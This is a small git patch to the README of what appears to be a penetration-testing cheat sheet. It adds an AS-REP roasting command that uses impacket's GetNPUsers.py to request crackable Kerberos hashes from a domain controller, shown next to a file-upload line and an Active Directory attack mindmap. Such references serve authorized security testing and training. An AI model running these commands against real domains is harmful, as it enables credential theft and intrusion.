From c1c437ce6544d6341e828e4ff38de613b17395a6 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Mon, 5 Sep 2022 11:43:38 -0400 Subject: [PATCH] Update README.md --- README.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/README.md b/README.md index 3ef5c31..03e631d 100644 --- a/README.md +++ b/README.md @@ -604,6 +604,18 @@ upload {FILE.exe} ![Active Directory](https://raw.githubusercontent.com/Orange-Cyberdefense/arsenal/master/mindmap/pentest_ad.png) +```bash + +# ASREP ROAST +python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip {IP ADDRESS} -request '{DC.NAME}/' + + +``` + + + + +
# Buffer Overflow